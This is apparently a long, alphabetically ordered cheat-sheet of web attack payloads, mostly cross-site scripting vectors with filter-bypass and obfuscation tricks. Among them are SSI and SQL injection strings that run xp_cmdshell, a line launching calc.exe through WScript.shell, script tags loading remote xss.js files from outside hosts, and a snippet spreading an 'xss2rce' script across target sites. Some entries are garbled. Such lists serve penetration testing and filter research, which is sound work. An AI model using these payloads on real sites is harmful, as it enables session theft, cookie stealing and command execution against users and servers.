- evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7 evil](cod)
- ‘;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’ — &&
- <! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT
- <;! — #exec cmd=”;/bin/echo ‘;<;SCRIPT SRC’;”; →;<;! — #exec cmd=”;/bin/echo ‘;=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.cx/xss.js></SCRIPT>'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.ha.ckers.org/a.js></SCRIPT>;'"-->
- <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xxxx.com/xss.js></SCRIPT>'"-->
- execScript()
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- $ exiftool -Artist=’”><img src=1 onerror=alert(1)>’ FILENAME.jpeg
- exiftool -Artist= ><img src=1 onerror=alert(document.domain)> brute.jpeg
- ‘,expanded:’\x2F’},function(file){path = file;document.getElementById(“pathbox”).value = path;});prompt(document.location);$(‘#fileTreeDemo_1’).fileTree({script:’../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir
- exp/*<A STYLE_NeatHtmlReplace=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’
- exp/*<A STYLE=’no\xss:noxss(“*//*”);
- exp/*<A STYLE=’no\xss:noxss(“**”);
- exp/*<A STYLE=’no\xss:noxss(“*//*”); xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)’>
- exp/*<A STYLE=’no\xss:noxss(\”*//*\”);
- exp/*<XSS STYLE='no\xss:noxss("*//*");
- exppression(alert(“XSS”))’>
- expr\65ssion(alert(1))
- expression(alert(‘XSS’));
- expressionG/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
- expression(open(alert(1)))
- expression:/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
- expression <style>*{font-family:’Serif}’;x[value=expression(alert(URL=1));]{color:red}</style>
- exp/*<;XSS STYLE=’;no\xss:noxss(“;*//*”;);
- exp/*<XSS ?STYLE=’no\xss:noxss(“*//*”); ?
- exp/*<XSS STYLE=’no\xss:noxss(“*//*”);
- exp/*<XSS STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- ExternalInterface.call(“console.log”,q);
- ExternalInterface.call(“document.write”,”<script>confirm(1)</script>”);
- ExternalInterface.call(“eval”,”myWindow=window.open(‘’,’’,’width=200,height=100'); myWindow.document.write(\”<html><head><script src=\’http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()");
- ExternalInterface.call(“setTimeout”, ExternalInterface.objectID + ‘_event’ + “(‘“ + eventName + “‘,” + eventValues + “)”, 0);
- external.NavigateAndFind(‘ ‘,[],[])
- external.NavigateAndFind(‘http://xss.cx',[],[])
- extra1 <tag extra2 handler=code> extra3
- extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
- extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
- F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
- %F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
- ( false + ���� )[1] = ��a��
- false + ���� = ��false��
- [F,A,L,S,E, T,R,U,E] = [!!0] + !0;
- [F,A,L,S,E, T,R,U,E] = [!!0] + !0;A+L+E+R+T;
- [F,B,Z,S,J, O,W,U,E] = [!!0] + !0;
- [F,B,Z,S,J, O,W,U,E] = [!!0] + !0;B+Z+J+W+O;
- [F,B,Z,S,J,O,W,U,E] = [!!0] + !0;eval(eval(“window.B+Z+window.J+window.W+O+’(0b10100111001??_�V)
- f=document.createElement(iframe);
- fetch(‘//0’).then(function(r){r.text().then(function(w){write(w)})})
- f=’file=akismet/index.php’
- Filename=”<<script>alert(‘xss’)<! — a →a.jpg”
- [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();//
- [].filter.constructor(‘ale’+’rt(4)’)();
- Firefox clipboard-hijack without script and css : http://<img alt=”evil/#” width=0 height=0 >
- Firefox cookie xss: with(document)cookie=’???��???��?????��????????��??????��?’,write(cookie);
- FireFox: this[Object[“keys”](this)[5]](1)
- firefoxurl:test|”%20-new-window%20javascript:alert(\’Cross%2520Browser%2520Scripting!\’);”
- Firefox (\x09, \x0a, \x0d, \x20)
- five={{insert(me._nodes.0.scriptprop)}}
- flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
- flash.external.ExternalInterface.call(alert, XSS);
- flash.external.ExternalInterface.call(eval, cmd);
- flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);
- flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”)
- flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
- flashmediaelement.swf?jsinitfunctio%gn=alert`1`
- fo.appendChild(i);
- fo = document.createElement(form);
- fo.elements[0].value=follow;
- ?FollowSite=0&SiteName=’-confirm(document.domain)-’
- font-family:a/**/ression(alert(1))(‘\’)exp\’)
- font-family:expression(alert)(1)
- “><font size=70 color=red>
- <font style=’color:expression(alert(1))’>
- <font style=’color:expression(alert(document.cookie))’>
- </font>/<svg><style>{src:’<style/onload=this.onload=confirm(1)>’</font>/</style>
- foo%00<script>alert(document.cookie)</script>
- foo\; alert(document.cookie);//;
- foo\��; alert(document.cookie);//��;
- ?foobar=<script>if
- foo\i; alert(document.cookie);//i;
- <! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”>
- <! foo=”[[[Inception]]”><x foo=”]foo><script>javascript:alert(1)</script>”>
- <! foo=”><script>alert(1)</script>”>
- <? foo=”><script>alert(1)</script>”>
- </ foo=”><script>alert(1)</script>”>
- foo<script>alert(1)</script>
- foo<script>alert(document.cookie)</script>
- foo<script>alert(/Xss-By-Muhaddi/)</script>
- foo<script>alert(/Xss/)</script>
- <? foo=”><script>confirm(1)</script>”>
- <! foo=”><script>javascript:alert(1)</script>”>
- <? foo=”><script>javascript:alert(1)</script>”>
- </ foo=”><script>javascript:alert(1)</script>”>
- “<foo>” + value + “</foo>”
- <! ‘=”foo”><x foo=’><img src=x onerror=alert(2)//’>
- <!’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
- <?’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
- <? ‘=”foo”><x foo=’><img src=x onerror=alert(3)//’>
- <% foo><x foo=”%><script>alert(123)</script>”>
- <? foo=”><x foo=’?><script>alert(1)</script>’>”>
- <% foo><x foo=”%><script>alert(1)</script>”>
- <? foo=”><x foo=’?><script>javascript:alert(1)</script>’>”>
- <% foo><x foo=”%><script>javascript:alert(1)</script>”>
- <! foo=”[[[x]]”><x foo=”]foo><script>alert(1)</script>”>
- for(;D<15;)C+=!d[D+=4]
- for(;D<19;)C+=!d[D+=4]
- <foreignObject xlink:href=”data:text/xml,%3Cscript xmlns=’http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
- <foreignObject xlink:href=”javascript:alert(1)”/>
- for(i=0; i<targets.length; i++){
- for(i=10;i>1;i — )confirm(i);new ActiveXObject(“WScript.shell”).Run(‘calc.exe’,1,true);
- for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?]
- for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
- for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))(
- for(i in n={????????????????:”constructor”})[][?=n[i]][?]
- for(i in n={????????????????:”constructor”})[][?=n[i]][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
- for((i)in(self))eval(i)(1)
- for(location of [‘javascript:alert(/ff/)’]);
- <formaction='data:text/html
- <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
- <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
- <form/action=’data:text/html,<script>alert(1)</script>’><button>CLICK
- <formaction=’data:text/html,<script>alert(1)</script>’><button>CLICK
- <form/action=’data:text/html,<script>alert(1)</script>’><button>CLICK // Mario
- <form action=’data:text/html,<script>confirm(1)</script>’><button>CLICK
- <form action=”http://brutelogic.com.br/chall/minified.php" method=”POST” enctype=”multipart/form-data”>
- <form action=http://brutelogic.com.br/chall/minified.php method=POST enctype=multipart/form-data>
- <form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit>
- <form action=javascript:alert(165)><input type=submit>
- <form action=javascript:alert(1)><input type=submit>
- <form action=javascript:alert(1)><input type=submit>
- <form action=”Javascript:alert(1)”><input type=submit>
- <form action=”Javascript:alert(1)”><input type=submit> // Firefox, IE
- <form/action=javascript:alert(22)><input/type=submit>
- formaction=javascript:alert(21)>M
- <form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit>
- //<form/action=javascript:alert(document.cookie)><input/type=’submit’>//
- //<form/action=javascript:confirm(document.cookie)><input/type=’submit’>//
- <form action=”javas	cript:confirm(1)” method=”get”><input type=”submit” value=”Submit”></form>
- <form action=’java	scri	pt:confirm(1)’><button>CLICK
- form.action = ‘<?php echo $url; ?>’
- <form><a href=”javascript:\u0061lert(1)”>X
- <form><a href=”javascript:\u0061lert(1)”>X
- <form><a href=”javascript:\u0061lert(1)”>X</script><img/*/src=”worksinchrome:prompt(1)”/*/onerror=’eval(src)’>
- form.appendChild(e);
- <form><button
- <form><button formaction=”javascript:alert(123)”>crosssitespt
- <form><button formaction=javascript:alert(167)>click
- <form><button formaction=javascript:alert(1)>click
- <form><button formaction=javascript:alert(1)>click
- <form><button formaction=”javascript:alert(1)”>//INJECTX
- <form><button formaction=”javascript:alert(73)%%0D3C! —
- <form><button formaction=”javascript:alert(XSS)”>lol
- <form><button formaction=javascript:alert(1)>CLICKME
- <form><button formaction=javascript:alert(1)>CLICKME
- <Form> <button formaction = javascript & colon; alert (1)> CLICKME
- <form><button formaction=javascript:alert(1)>M
- <form><button formaction=javascript:confirm(1)>CLICKME
- <form><button formaction=”javascript:javascript:alert(1)”>X
- form = document.createElement(‘form’);
- <form formaction=popup=1; onclick=popup=1;><object>
- <form href=’x’onclick=popup=1;><select>
- form.id = ‘form_xss’;
- <form id=”myform” value=”” action=javascript	:eval(document.getElementById(‘myform’).elements[0].value)><textarea>confirm(1)</textarea><input type=”submit” value=”Absenden”></form>
- <form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION
- <form id=”test” /><button form=”test” formaction=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>X
- <form id=”test” /><button form=”test” formaction=”javascript:javascript:alert(1)”>X
- <form id=”test”></form><button form=”test” formaction=”javascript:alert(1)”>X</button>
- <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
- <form><iframe 	  src=”javascript:alert(1)” 	;>
- <form><iframe 	  src=”javascript:confirm(1)” 	;>
- <form><iframe src=”javascript:alert(1)” ;>
- <form><input formaction=javascript:alert(168) type=submit value=click>
- <form><input formaction=javascript:alert(169) type=image value=click>
- <form><input formaction=javascript:alert(170) type=image src=SOURCE>
- <form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
- <form><input formaction=javascript:alert(1) type=image src=SOURCE>
- <form><input formaction=javascript:alert(1) type=image src=SOURCE>
- <form><input formaction=javascript:alert(1) type=image value=click>
- <form><input formaction=javascript:alert(1) type=image value=click>
- <form><input formaction=javascript:alert(1) type=submit value=click>
- <form><input formaction=javascript:alert(1) type=submit value=click>
- ?</form><input type=”date” onfocus=”alert(1)”>
- <form><input type=”image” value=”submit” formaction=//goo.gl/nlX0P>
- <form><input type=submit formaction=//xss.cx><textarea name=x>
- <form><isindex formaction=”javascript:confirm(1)”
- <form><isindex formaction=”java	s&NewLine&cript:confirm(1)”>
- form.method=’POST’;
- <form method=post action=”//brutelogic.com.br/tests/comments.php”
- <form method=post onclick=elements[0].value=outerHTML;submit()>
- <form name=location >
- <form oninput=alert(1)></input></form>
- <form oninput=”alert(1)”><input type=”range”
- <form onsubmit=alert(105)><input type=submit>
- <form onsubmit=alert(1)><input type=submit>
- <form onsubmit=alert(23)><button>M
- form.target = ‘frame_xss’;
- <form><textarea onkeyup=’\u0061\u006C\u0065\u0072\u0074(1)’>
- <form><textarea onkeyup=’\u0061\u006C\u0065\u0072\u0074(1)’>
- for(n in{constructor:0})[][?=n][?](/alert(1)/.source)()
- for([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
- For([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}
- fo.setAttribute(action, profile.php?id=100);
- fo.setAttribute(method, post);
- fo.setAttribute(target, myFrame);
- fo.submit();
- four=”{{set(‘insert’,me.root.ownerbody.appendChild)}}”
- frame = document.createElement(‘iframe’);
- frame.name=’frame_xss’;
- <FRAMESET><FRAME id=XSS SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- <FRAMESET><FRAME id=XSS SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
- <FRAMESET><FRAME RC=””+”javascript:confirm(5);”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
- <FRAMESET><FRAME src=javascript:alert(‘XpSS’)></FRAME></FRAMESET>
- <FRAMESET><FRAME SRC=javascript:alert(‘XSS’)></FRAME></FRAMESET>
- <;FRAMESET>;<;FRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/FRAMESET>;
- <FRAMESET><FRAME ?SRC=”javascript:alert(‘XSS’) ?;”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:confirm(5);”></FRAMESET>
- <FRAMESET><FRAME SRC=”javascript:document.vulnerable=true;”></frameset>
- <FRAMESET><FRAME SRC=”javascript:javascript:alert(1);”></FRAMESET>
- <frameset><frame src onload=alert(1)>
- <frameset><frame/src=//xss.cx>
- <frameset><frame src=”xss”></frameset>
- <frameset id=”x”onload=popup=1;>
- <frameset onBlur frameset onBlur=”javascript:javascript:alert(1)”></frameset onBlur>
- <frameset onFocus frameset onFocus=”javascript:javascript:alert(1)”></frameset onFocus>
- <frameset onload=alert(1)>
- <frameset onload=alert(123)>
- <frameset onload=javascript:alert(1)>
- <frameset onload=javascript:javascript:alert(1)></frameset>
- <frameset onload=popup=1;>
- <frameset onpageshow=”alert(1)”>
- <frameset/onpageshow=alert(1)>
- <frameset onScroll frameset onScroll=”javascript:javascript:alert(1)”></frameset onScroll>
- frame.style=’visibility: hidden;’;
- fr = document.createElement(iframe);
- fr.setAttribute(name, myFrame);
- fr.setAttribute(style, display:none);
- f.setAttribute(style,display:none);
- f.src=//+targets[i]+/PATH/PAGE?PARAM=<script src=//DOMAIN/xss2rce.js>;
- \);function%20someFunction(a){}prompt(1)//
- Function(‘a=`${alert`’,’`}`){‘)()
- Function(‘a=alert``’,’’)()
- (function(a){alert(1)}).call()
- (function({a,b,c}={a:1,b:2,c:3}){alert(`${a},${b},${c}`)})()
- Function(‘a=[class A extends Function(‘,’}]){alert(1)’)()
- Function(‘){alert()//’, ‘’)();
- function() {alert(1)}
- function() {alert(1
- Function`$${`a${`l${`e${`r${`t${`(${`1${`)`}`}`}`}`}`}`}`}$```
- Function`alert(1)```````````
- Function(“ale”+”rt(1)”)();
- Function{}(‘alert(1)’)``
- (function(){alert(9)})()
- Function(“a=`”,”`,xss=1){alert(xss)”)()
- functionBody = “with($context){with($data||{}){return{“ +rewrittenBindings + “}}}”;
- function(){code}
- (function{}).constructor
- function document::onreadystatechange(){alert(1);}
- (function { eval(‘var a=1’); }); alert(typeof a);
- function filter($value) {return preg_replace($this->_expressions, ‘’, $value);
- function::[‘location’]=’javascript’’:alert(/FF/)’
- !function(lol=alert(1)){}()
- Function.prototype.toString=Function.prototype.call;”alert(1)//”.replace(“//”,Function)
- Function(‘x=alert`1`’,’y’)()
- function xss(why,){}//
- f=(x=alert(1))=>{}; f();
- f=(x=alert(1))=>{};f();
- +g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
- Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
- gbk chatset:%bb\”alert(1)
- Generic Source Breaking
- $.get(‘//0’,function(r){write(r)})>
- $.getScript(‘//0’)
- ?getURL,javascript:alert(1)”,
- ?getURL(javascript:alert(1))”,
- #getURL,javascript:alert(1)”,
- getURL(“javascript:alert(‘X9SS’)”)
- getURL(“javascript:alert(‘XSS’)”)
- getURL(“javascript:confirm(document.location)”)
- ?getURLValue=javascript:alert(1)”,
- GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
- g’”></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
- <g onload=��javascript:alert(9)��></g></svg>
- Google Chrome Auditor Bypass (up to v51)
- ?goto=javascript:alert(1)”,
- ?goto,javascript:alert(1)”,
- #goto,javascript:alert(1)”,
- >
- >
- >
- >
- <h1><font color=”#00FF00">Ege was here :)</font></h1>
- <h1><font color=blue>hellox worldss</h1>
- <h1>Hello,<script>alert(1)</script>!</h1>
- <h1>Hello, <script>alert(1)</script>!</h1>
- “><h1><IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>”>123</h1>
- “><h1><IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
- ><h1><IFRAME width=”420" height=”315" frameborder=”0" onmouseover=”document.location.href=’https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
- “><h1><iframe width=”420" height=”315" src=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" allowfullscreen></iframe>123</h1>
- “><h1><IFRAME width=”420" height=”315" SRC=”http://www.youtube.com/embed/sxvccpasgTE" frameborder=”0" onmouseover=”alert(document.cookie)”></IFRAME>123</h1>
- <h1>INJECTX</h1>
- <h1><marquee><b><u><i>XSS</i></u></b></marquee></h1>
- <h1 _-_-_-ng_-_-_click=”$event.view.location.replace(‘javascript:alert(1)’)”>XSS</h1>
- <h1/onclick=alert(1)>a//INJECTX
- ><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
- ��><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
- ><h1/onclick=a\u006cer\u0074(/xss-by-shawar/)>clickme</h1>
- “><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
- “><h1 onclick=prompt(1)>Clickme</h1>
- “><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
- <h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style>
- <h1/onmouseover=’alert(1)’>renwa
- <h1/onmouseover=’alert(1)’>Renwa
- ><h1 onmouseover=alert(Xss-By-Muhaddi)>Hover Me</h1>
- ><h1 onmouseover=alert(Xss)>Hover Me</h1>
- ��><h1 onmouseover=alert(��Xss��)>Hover Me</h1>
- “><h1/onmouseover=’\u0061lert(1)’>
- [‘<h1>Payload</h1>’,’<script>alert(/HOLA/);</script>’]
- “><h2 id=”Iamheading”onmouseover=”confirm(1)”>
- <handler id=”y”>alert(1)</handler>
- <handler xmlns:ev=”http://www.w3.org/2001/xml-events" ev:event=”load”>alert(1)</handler>
- <head><base href=”javascript://”></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
- <head><base href=”javascript://”/></head><body><a href=”/. /,alert(1)//#”>XXX</a></body>
- <head><base href=”javascript://”></head><body><a href=”/. /,javascript:alert(1)//#”>XXX</a></body>
- head -c 1000000 /dev/urandom
- head -c 1000000 /dev/urandom > /tmp/bin.bin
- header(‘Refresh: 0;url=javascript:alert(1)’);
- header(‘Refresh: 0;url=javascript:confirm(1)’);
- <;HEAD>;<;META HTTP-EQUIV=”;CONTENT-TYPE”; CONTENT=”;text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(‘;XSS’;);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-
- <head><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
- <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD><SCRIPT>alert(‘XSS’);</SCRIPT>
- Hello @Html.Raw(MyValue)
- Hello <%= MyValue =>
- <! — Hello — world > <SCRIPT>confirm(1)</SCRIPT> →
- href=[0x0b]” onclick=alert(1)//
- href= action= formaction= location= on*= name= background= poster= src= code= data=
- href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
- href=”data:text/html,<script>alert(document.domain)<
- href=javascript:alert(1)
- “ href=javascript:alert(1)
- href=javascript:alert(1)//>Click</a>
- “ href=javascript:alert(1) <math><!V
- href=vjavascript:alert(1)//v>Click</a>
- </html>
- </HTML>
- <;HTML>;<;BODY>;
- <HTML><BODY>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>”></BODY></HTML>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>”></BODY></HTML>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>”></BODY></HTML><HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”></BODY></HTML>
- <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(‘XSS’)</SCRIPT>”> </BODY></HTML>
- <html><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>”></BODY></html>
- <html data-toggle=tab href=”<img src=k onerror=alert(66)>”>
- <html><noalert><noscript>(123)</noscript><script>(123)</script>
- <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
- <html onMouseDown html onMouseDown=”javascript:javascript:alert(1)”></html onMouseDown>
- <html onMouseEnter html onMouseEnter=”javascript:parent.javascript:alert(1)”></html onMouseEnter>
- <html onMouseLeave html onMouseLeave=”javascript:javascript:alert(1)”></html onMouseLeave>
- <html onmousemove html onmousemove=”javascript:javascript:alert(1)”></html onmousemove>
- <html onMouseMove html onMouseMove=”javascript:javascript:alert(1)”></html onMouseMove>
- <html onMouseOut html onMouseOut=”javascript:javascript:alert(1)”></html onMouseOut>
- <Html Onmouseover=(alert)(1) //
- <html onmouseover html onmouseover=”javascript:javascript:alert(1)”></html onmouseover>
- <html onMouseOver html onMouseOver=”javascript:javascript:alert(1)”></html onMouseOver>
- <html onMouseUp html onMouseUp=”javascript:javascript:alert(1)”></html onMouseUp>
- <html onMouseWheel html onMouseWheel=”javascript:javascript:alert(1)”></html onMouseWheel>
- <html ontouchcancel=alert(1)>
- <html ontouchend=alert(1)>
- <html ontouchend=alert(1)>
- <html ontouchmove=alert(1)>
- <html ontouchmove=alert(1)>
- <html ontouchstart=alert(1)>
- <html ontouchstart=alert(1)>
- <html:script>javascript:alert(1);</html:script></html:html>
- </html></script> // XML inside JS
- htmlspecialchars($_REQUEST[q], ENT_QUOTES);
- htmlStr = ‘<a href=”’+*dataentities*+’javascript:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
- htmlStr = ‘<a href=”javascript’+*dataentities*+’:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
- htmlStr = ‘<a href=”javascript’+*dataentities*+’123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
- <html><title>{alert(‘xss’)}</title></html>
- <;HTML xmlns:xss>;
- <HTML xmlns:xss>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”><xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:javascript:alert(1)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss</html>
- <HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
- );HTP.PRINT(:1); —
- );HTP.PRINT(:1); — =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
- “h”+”t”+”t”+”p”,
- “h”+”t”+”t”+”p”A
- http://a/%%30%30
- http://aa<script>alert(123)</script>
- http://aa'><script>alert(123)</script>
- http://aa"><script>alert(123)</script>
- @brutelogic.com.br/webgun/test.php?p=”>http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>
- http://brutelogic.com.br/webgun/test.php?p=<brute id=test onmouseover=alert(1)>AAAA
- http://brutelogic.com.br/webgun/test.php?p=<brute onmouseover=pop(1)>AAAA
- http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
- http://domain/page?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
